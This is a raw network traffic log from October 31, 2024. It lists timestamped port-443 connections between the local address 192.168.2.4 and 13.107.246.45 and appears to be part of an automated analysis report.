Oct 31, 2024 19:20:25.124099970 CET	51368	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.124721050 CET	51368	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.124742031 CET	443	51368	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.124754906 CET	51368	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.124759912 CET	443	51368	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.134861946 CET	443	51369	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.135099888 CET	443	51369	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.135147095 CET	443	51369	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.135181904 CET	51369	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.135221004 CET	51369	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.136116028 CET	51369	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.136125088 CET	443	51369	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.136158943 CET	51369	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.136164904 CET	443	51369	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.174853086 CET	51373	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.174865007 CET	443	51373	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.175242901 CET	51373	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.186137915 CET	51373	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.186151028 CET	443	51373	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.197534084 CET	51374	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.197577000 CET	443	51374	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.197669983 CET	51374	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.201325893 CET	51374	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.201360941 CET	443	51374	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.247097969 CET	443	51370	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.247741938 CET	443	51370	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.247854948 CET	51370	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.250408888 CET	443	51371	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.271259069 CET	51370	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.271274090 CET	443	51370	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.271282911 CET	51370	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.271287918 CET	443	51370	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.274178982 CET	51371	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.274198055 CET	443	51371	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.274815083 CET	51371	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.274820089 CET	443	51371	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.277149916 CET	51375	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.277169943 CET	443	51375	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.277784109 CET	51375	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.277992010 CET	51375	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.278019905 CET	443	51375	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.403522968 CET	443	51371	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.403600931 CET	443	51371	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.403660059 CET	51371	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.403938055 CET	51371	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.403958082 CET	443	51371	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.403985977 CET	51371	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.403992891 CET	443	51371	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.407917023 CET	51376	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.407946110 CET	443	51376	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.408030033 CET	51376	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.408224106 CET	51376	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.408238888 CET	443	51376	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.631572962 CET	443	51372	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.632119894 CET	51372	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.632143021 CET	443	51372	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.632641077 CET	51372	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.632647991 CET	443	51372	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.821645021 CET	443	51372	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.821706057 CET	443	51372	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.822011948 CET	51372	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.822046995 CET	51372	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.822065115 CET	443	51372	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.822115898 CET	51372	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.822122097 CET	443	51372	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.825265884 CET	51377	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.825305939 CET	443	51377	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.825377941 CET	51377	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.825537920 CET	51377	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.825551033 CET	443	51377	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.929368973 CET	443	51374	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.930773973 CET	51374	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.930792093 CET	443	51374	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.931298018 CET	51374	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.931303978 CET	443	51374	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.934830904 CET	443	51373	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.938728094 CET	51373	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.938751936 CET	443	51373	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.939120054 CET	51373	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.939125061 CET	443	51373	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.014349937 CET	443	51375	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.014870882 CET	51375	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.014883041 CET	443	51375	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.015597105 CET	51375	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.015603065 CET	443	51375	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.060954094 CET	443	51374	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.061064959 CET	443	51374	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.061273098 CET	51374	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.061304092 CET	51374	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.061316967 CET	443	51374	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.061328888 CET	51374	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.061333895 CET	443	51374	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.064351082 CET	51378	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.064378023 CET	443	51378	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.064455986 CET	51378	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.064609051 CET	51378	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.064624071 CET	443	51378	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.067333937 CET	443	51373	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.067364931 CET	443	51373	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.067413092 CET	443	51373	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.067475080 CET	51373	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.067631960 CET	51373	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.067641973 CET	443	51373	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.067670107 CET	51373	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.067676067 CET	443	51373	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.070406914 CET	51379	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.070457935 CET	443	51379	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.070548058 CET	51379	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.070719004 CET	51379	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.070734978 CET	443	51379	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.146064997 CET	443	51375	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.146151066 CET	443	51375	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.146390915 CET	51375	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.146436930 CET	51375	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.146451950 CET	443	51375	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.146465063 CET	51375	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.146470070 CET	443	51375	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.147969961 CET	443	51376	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.149496078 CET	51380	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.149513006 CET	443	51380	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.149595022 CET	51380	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.149728060 CET	51380	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.149741888 CET	443	51380	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.149950981 CET	51376	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.149967909 CET	443	51376	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.150433064 CET	51376	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.150439024 CET	443	51376	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.278198957 CET	443	51376	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.278271914 CET	443	51376	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.278456926 CET	51376	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.278795958 CET	51376	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.278816938 CET	443	51376	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.278826952 CET	51376	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.278832912 CET	443	51376	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.281769991 CET	51381	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.281805992 CET	443	51381	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.281980991 CET	51381	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.282264948 CET	51381	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.282280922 CET	443	51381	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.566407919 CET	443	51377	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.570625067 CET	51377	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.570652008 CET	443	51377	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.571131945 CET	51377	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.571137905 CET	443	51377	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.699279070 CET	443	51377	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.699309111 CET	443	51377	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.699361086 CET	443	51377	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.699367046 CET	51377	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.699429035 CET	51377	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.699659109 CET	51377	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.699678898 CET	443	51377	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.699712038 CET	51377	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.699718952 CET	443	51377	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.703075886 CET	51382	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.703134060 CET	443	51382	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.703200102 CET	51382	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.703351974 CET	51382	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.703358889 CET	443	51382	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.788578033 CET	443	51379	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.789139032 CET	51379	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.789164066 CET	443	51379	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.789669037 CET	51379	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.789675951 CET	443	51379	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.806286097 CET	443	51378	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.810453892 CET	51378	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.810483932 CET	443	51378	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.810899019 CET	51378	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.810904980 CET	443	51378	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.877228022 CET	443	51380	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.879939079 CET	51380	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.879957914 CET	443	51380	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.880558014 CET	51380	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.880563974 CET	443	51380	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.919528008 CET	443	51379	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.919554949 CET	443	51379	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.919606924 CET	443	51379	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.919697046 CET	51379	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.919858932 CET	51379	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.920042038 CET	51379	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.920061111 CET	443	51379	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.920072079 CET	51379	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.920078039 CET	443	51379	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.923230886 CET	51383	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.923261881 CET	443	51383	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.923357010 CET	51383	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.923511982 CET	51383	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.923516989 CET	443	51383	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.939135075 CET	443	51378	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.939234972 CET	443	51378	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.939341068 CET	51378	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.939523935 CET	51378	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.939538956 CET	443	51378	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.939548969 CET	51378	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.939553022 CET	443	51378	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.943169117 CET	51384	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.943212032 CET	443	51384	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:26.943289995 CET	51384	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.943439960 CET	51384	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:26.943454981 CET	443	51384	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.006144047 CET	443	51380	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.006223917 CET	443	51380	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.010297060 CET	51380	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.010329962 CET	51380	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.010341883 CET	443	51380	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.010355949 CET	51380	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.010361910 CET	443	51380	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.013211012 CET	51385	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.013241053 CET	443	51385	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.013324022 CET	51385	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.013456106 CET	51385	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.013468981 CET	443	51385	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.018364906 CET	443	51381	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.022566080 CET	51381	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.022610903 CET	443	51381	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.023051977 CET	51381	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.023057938 CET	443	51381	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.151648998 CET	443	51381	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.151680946 CET	443	51381	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.151729107 CET	443	51381	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.151750088 CET	51381	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.151778936 CET	51381	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.152074099 CET	51381	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.152096033 CET	443	51381	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.152108908 CET	51381	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.152115107 CET	443	51381	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.155420065 CET	51386	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.155461073 CET	443	51386	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.155606031 CET	51386	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.155718088 CET	51386	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.155731916 CET	443	51386	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.579421043 CET	443	51382	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.581592083 CET	51382	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.581630945 CET	443	51382	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.582206011 CET	51382	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.582218885 CET	443	51382	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.660219908 CET	443	51383	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.667447090 CET	51383	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.667468071 CET	443	51383	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.667970896 CET	51383	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.667974949 CET	443	51383	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.680149078 CET	443	51384	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.690310955 CET	51384	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.690327883 CET	443	51384	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.690820932 CET	51384	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.690825939 CET	443	51384	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.711072922 CET	443	51382	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.711174011 CET	443	51382	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.711273909 CET	51382	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.711680889 CET	51382	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.711680889 CET	51382	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.711707115 CET	443	51382	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.711715937 CET	443	51382	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.714643002 CET	51387	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.714694977 CET	443	51387	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.714770079 CET	51387	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.714922905 CET	51387	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.714937925 CET	443	51387	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.752314091 CET	443	51385	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.762156010 CET	51385	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.762176991 CET	443	51385	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.766046047 CET	51385	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.766055107 CET	443	51385	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.793693066 CET	443	51383	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.793721914 CET	443	51383	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.793768883 CET	443	51383	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.793816090 CET	51383	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.793869972 CET	51383	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.795874119 CET	51383	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.795883894 CET	443	51383	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.795893908 CET	51383	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.795898914 CET	443	51383	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.816986084 CET	443	51384	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.817078114 CET	443	51384	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.817205906 CET	51384	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.825201988 CET	51384	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.825201988 CET	51384	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.825218916 CET	443	51384	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.825229883 CET	443	51384	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.871836901 CET	51388	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.871881962 CET	443	51388	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.871958971 CET	51388	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.872550011 CET	51388	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.872562885 CET	443	51388	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.876939058 CET	51389	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.876955986 CET	443	51386	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.876976967 CET	443	51389	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.878465891 CET	51386	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.878487110 CET	443	51386	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.878529072 CET	51389	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.879334927 CET	51386	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.879338026 CET	51389	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.879342079 CET	443	51386	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.879353046 CET	443	51389	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.892765999 CET	443	51385	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.892795086 CET	443	51385	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.892844915 CET	443	51385	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.892909050 CET	51385	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.892909050 CET	51385	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.894298077 CET	51385	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.894325018 CET	443	51385	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.894603968 CET	51385	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.894612074 CET	443	51385	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.906230927 CET	51390	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.906246901 CET	443	51390	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:27.906308889 CET	51390	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.906944990 CET	51390	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:27.906955957 CET	443	51390	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.003603935 CET	443	51386	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.003680944 CET	443	51386	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.003730059 CET	51386	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.004029036 CET	51386	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.004029036 CET	51386	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.004050970 CET	443	51386	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.004060030 CET	443	51386	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.007332087 CET	51391	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.007378101 CET	443	51391	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.007493019 CET	51391	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.007615089 CET	51391	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.007620096 CET	443	51391	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.431845903 CET	443	51387	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.432537079 CET	51387	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.432547092 CET	443	51387	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.433485985 CET	51387	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.433506012 CET	443	51387	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.560615063 CET	443	51387	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.560821056 CET	443	51387	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.560879946 CET	51387	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.564892054 CET	51387	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.564892054 CET	51387	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.564908981 CET	443	51387	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.564918995 CET	443	51387	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.568490028 CET	51392	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.568522930 CET	443	51392	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.568587065 CET	51392	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.568777084 CET	51392	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.568787098 CET	443	51392	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.604466915 CET	443	51388	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.605093956 CET	51388	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.605118990 CET	443	51388	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.605578899 CET	51388	443	192.168.2.4	13.107.246.45
